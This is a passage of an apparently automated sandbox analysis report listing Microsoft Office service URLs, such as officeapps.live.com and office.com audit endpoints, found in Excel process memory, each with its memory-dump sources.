    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.760341609.0000000002B90000.00000004.00000020.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
    Source: EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/)(
    Source: EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/0
    Source: EXCEL.EXE, 00000000.00000003.497379607.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576787267.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576127019.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505090656.000000001343E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/D
    Source: EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/b
    Source: EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/m
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.620271659.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497379607.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576787267.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576127019.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505090656.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
    Source: EXCEL.EXE, 00000000.00000003.301409768.000000001343E000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/N
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639091590.00000000133F4000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
    Source: EXCEL.EXE, 00000000.00000003.301167821.0000000013497000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comP
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netR
    Source: 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abu
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$7
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.7
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com27
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com46
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comB6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comF7
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comH7
    Source: EXCEL.EXE, 00000000.00000002.766449411.00000000132B0000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comN
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comV6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comX6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comj7
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coml6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comn0
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comp6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coms.dll0
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comz6
    Source: EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com~7
    Source: EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
